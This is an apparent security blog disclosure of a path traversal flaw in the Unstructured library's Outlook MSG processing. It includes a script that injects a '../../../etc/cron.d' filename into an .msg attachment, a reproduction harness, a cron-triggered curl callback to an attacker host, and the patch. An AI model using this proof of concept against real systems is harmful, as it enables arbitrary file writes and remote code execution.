Security

CVE-2025-64712: Path Traversal RCE in Unstructured Library MSG Processing

A technical breakdown of CVE-2025-64712, a CVSS 9.8 critical path traversal remote code execution vulnerability in the Unstructured Python library (< 0.18.18). Unsanitized attachment filenames in Outlook MSG processing allow for path traversal, enabling an attacker to overwrite arbitrary files via a crafted MSG file and achieve code execution.

Mon 23 February 2026

CVE-2025-64712

Critical Path Traversal RCE in Unstructured Library MSG Processing

February 18, 2026 · CVSS 9.8 Critical · Unstructured < 0.18.18

CVE ID CVSS Affected Fixed
CVE-2025-64712 9.8 Critical < 0.18.18 0.18.18+

CVE-2025-64712 Overview: Path Traversal in Unstructured Library

The Unstructured Python library is an open-source toolkit for pre-processing complex document types. In a little over a year, the Unstructured library surpassed 4 million downloads and is used in nearly 10,000 public GitHub repositories, 100 Python packages, and behind the scenes in dozens of LLM-powered products. However, a critical Path Traversal (CWE-22) vulnerability was discovered in its partition_msg function, which processes Microsoft Outlook .msg files. When the process_attachments setting is enabled—which it is by default—the library can be manipulated to write files outside of its intended temporary directories.

def partition_msg(
filename: Optional[str] = None,
*,
file: Optional[IO[bytes]] = None,
metadata_filename: Optional[str] = None,
metadata_last_modified: Optional[str] = None, 
process_attachments: bool = True, # the vulnerability trigger 
**kwargs: Any,
) -> list[Element]:

<SNIP>

Path Traversal in Unstructured Library: Unsafe Filename Handling

The core of the issue is a Path Traversal (CWE-22) vulnerability. The library's _attachment_file_name() function pulls the name of an attachment directly from the .msg file without any sanitization.

@lazyproperty
def  _attachment_file_name(self) -> str:
      """The original name of the attached file, no path.
      This value is 'unknown' if it is not present in the MSG file (not
expected).
      """
      return self._attachment.file_name or "unknown" 

CVE-2025-64712 Proof-of-Concept: Remote Code Execution via Path Traversal

Exploitation of CVE-2025-64712 involves a deliberate three-stage process to transform a standard email attachment into a system-level command. The following steps outline how an attacker moves from a simple .msg file to full Remote Code Execution (RCE).

Step 1: Crafting the Initial .msg File

The attack begins by generating a legitimate Microsoft Outlook Message (.msg) file to serve as the delivery vector.

  • Initialize the Draft: Open Outlook and create a new email message.

  • Embed the Payload: Populate the message fields and attach the file containing your target content (e.g., a cron job script intended for the target’s configuration directory).

  • Export the File: Navigate to File > Save As (or Download > Download as MSG in web clients) to export the message.

At this stage, the file is harmless because the attachment name is standard (e.g., backup_job).

Viewing attachments in the .msg file

Step 2: Injecting the Traversal Path

The attacker uses a specialized Python script to modify the binary structure of the .msg file. By targeting the OLE structures within the file, the attacker renames the attachment from a simple filename to a relative path containing traversal sequences.

  • The Transformation: backup_job becomes ../../../etc/cron.d/backup_job.

  • The Result: A crafted payload.msg is generated where the filename itself contains the instructions to escape the temporary directory.

#!/usr/bin/env python3
"""
rename_msg_attachment.py
------------------------
Rename an attachment's filename inside a .msg (OLE2/Compound Document) file.
Supports new filenames of ANY length — reallocates mini-sectors as needed.

Edit the three variables below and run:
    python rename_msg_attachment.py
"""

import sys
import struct
import shutil
import os
import math



INPUT_FILE  = "backup.msg"        # Path to the source .msg file
OLD_NAME    = "backup_job"        # Current attachment filename 
NEW_NAME    = "../../../etc/cron.d/backup_job"       # New attachment filename 
OUTPUT_FILE = "payload.msg"                # Output path — leave empty "" to overwrite INPUT_FILE

<SNIP>


# Core rename logic

def rename_attachment(input_path, old_name, new_name, output_path):
    print(f"[*] Opening: {input_path}")
    ole = OleFile(input_path)

    attach_storages = find_attach_storages(ole)
    if not attach_storages:
        err("No attachment storages found in this .msg file.")

    print(f"[*] Found {len(attach_storages)} attachment(s).")

    renamed = 0
    for att in attach_storages:
        children = get_children(ole, att['idx'])
        by_name  = {c['name'].upper(): c for c in children}

        long_e  = by_name.get(prop_stream_name(PR_ATTACH_LONG_FILENAME).upper())
        short_e = by_name.get(prop_stream_name(PR_ATTACH_FILENAME).upper())
        disp_e  = by_name.get(prop_stream_name(PR_DISPLAY_NAME).upper())
        ext_e   = by_name.get(prop_stream_name(PR_ATTACH_EXTENSION).upper())

        current = None
        if long_e:
            current = read_unicode(ole, long_e['idx'])
        elif short_e:
            current = read_unicode(ole, short_e['idx'])

        print(f"    [{att['name']}]  current filename: {current!r}")

        if current is None or current.lower() != old_name.lower():
            continue

        # Encode new values
        new_encoded   = encode_unicode(new_name)
        short_encoded = encode_unicode(short_name(new_name))
        parts         = new_name.rsplit('.', 1)
        new_ext       = ('.' + parts[1]) if len(parts) == 2 else ''
        ext_encoded   = encode_unicode(new_ext)

        print(f"    [+] Match! Renaming '{current}' -> '{new_name}'")
        print(f"        old size: {len(encode_unicode(current))} bytes  "
              f"new size: {len(new_encoded)} bytes")

        if long_e:
            ole.write_stream(long_e['idx'], new_encoded)
            print(f"        ✓ Long filename patched.")

        if short_e:
            ole.write_stream(short_e['idx'], short_encoded)
            print(f"        ✓ Short filename patched -> '{short_name(new_name)}'")

        if disp_e:
            ole.write_stream(disp_e['idx'], new_encoded)
            print(f"        ✓ Display name patched.")

        if ext_e:
            ole.write_stream(ext_e['idx'], ext_encoded)
            print(f"        ✓ Extension patched -> '{new_ext}'")

        renamed += 1

    if renamed == 0:
        print(f"\n[!] No attachment named '{old_name}' was found.")
        all_names = []
        for att in attach_storages:
            children = get_children(ole, att['idx'])
            by_name  = {c['name'].upper(): c for c in children}
            long_e   = by_name.get(prop_stream_name(PR_ATTACH_LONG_FILENAME).upper())
            short_e  = by_name.get(prop_stream_name(PR_ATTACH_FILENAME).upper())
            name = None
            if long_e:
                name = read_unicode(ole, long_e['idx'])
            elif short_e:
                name = read_unicode(ole, short_e['idx'])
            if name:
                all_names.append(name)
        if all_names:
            print(f"    Available attachment(s): {', '.join(repr(n) for n in all_names)}")
            def similarity(a, b):
                a, b = a.lower(), b.lower()
                return sum(c in b for c in a) / max(len(a), 1)
            best = max(all_names, key=lambda n: similarity(old_name, n))
            if similarity(old_name, best) > 0.5:
                print(f"    Did you mean: '{best}' ?")
        sys.exit(1)

    ole.save(output_path)
    print(f"\n[✓] Saved to: {output_path}  ({renamed} attachment(s) renamed)")

<SNIP>

Successfuly renaming the attachment filename

Step 3: Setting Up the Test Environment

To reproduce the flaw, a controlled environment (typically a Docker container) is used to run the vulnerable version of the unstructured library (v0.18.15). A simple Python wrapper is written to call the partition_msg function with the critical process_attachments=True flag enabled.

import os
import sys
from unstructured.partition.msg import partition_msg

# Disable the digit limit that causes parser crashes
if hasattr(sys, 'set_int_max_str_digits'):
    sys.set_int_max_str_digits(0)
def process_msg():
    print("[*] Handing exploit.msg to partition_msg()...")


    try:
        # This triggers the vulnerable function:
        partition_msg(
            filename="payload.msg",
            process_attachments=True
        )
    except Exception as e:
        # We catch the exception because the parser often crashes 
        # AFTER the file is written due to OLE sector math errors.
        print(f"[!] Parser finished with: {e}")

    # THE FINAL VERDICT
    if os.path.exists("/etc/cron.d/backup_job"):
        print("\n" + "="*45)
        print("!!! VULNERABILITY REPRODUCED !!!")
        print("The library  wrote successfuly to '/etc/cron.d/backup_job'")
        with open("/etc/cron.d/backup_job", "r") as f:
            print(f"File content: {f.read()}")
        print("="*45)
    else:
        print("\n[-] Exploit failed: /etc/cron.d/backup_job not found.")

if __name__ == "__main__":
    process_msg()

Step 4: Exploitation and RCE

When the reproduction script processes the malicious payload.msg, the library extracts the attachment. Because it lacks sanitization, it joins the traversal string to its internal path, writing the file directly into the host's system directory.

  • File Write: The library writes the attacker's script to /etc/cron.d/backup_job.
  • Command Execution: The system's cron daemon picks up the new job, which might contain a command like curl http://attacker-ip:port/rce_test.
  • The Verdict: The attacker observes an incoming request on their server, confirming that they can now execute arbitrary code on the target system.

Remote Code Execution via cron jobs

How to Fix CVE-2025-64712 in Unstructured Library

The most effective way to secure your environment is to update to Unstructured version 0.18.18 or higher. The fix introduces a robust sanitization process that strips away dangerous path components.

Remediated Code Analysis

The patched version now includes logic to clean the filename for both Unix and Windows path separators:

# The updated, safe logic in v0.18.18+
raw_filename = self.attachment.file_name or "unknown" 

# Remove path components and handle cross-platform attacks
safe_filename = os.path.basename(raw_filename.replace("\\", "/")) 

# Strip null bytes and control characters
safe_filename = safe_filename.replace("\0", "") 

# Ensure the filename isn't empty or just dots
if not safe_filename or safe_filename in (".", ".."): 
    safe_filename = "unknown" 

CVE-2025-64712 Mitigation and Best Practices

  • Update Now: If you use unstructured for email processing, ensure you are on version 0.18.18 or later versions.
  • Sanitize Inputs: Always use os.path.basename() when handling filenames provided by external files.
  • Permission Check: Run your processing scripts with the minimum necessary permissions to limit the impact of a potential file-write vulnerability.
Resource Link
Unstructured CVE-2025-64712 https://github.com/Unstructured-IO/unstructured/security/advisories/GHSA-gm8q-m8mv-jj5m
Unstructured Fix https://github.com/Unstructured-IO/unstructured/compare/0.18.15...0.18.18
NVD https://nvd.nist.gov/vuln/detail/CVE-2025-64712
CWE-22 https://cwe.mitre.org/data/definitions/22.html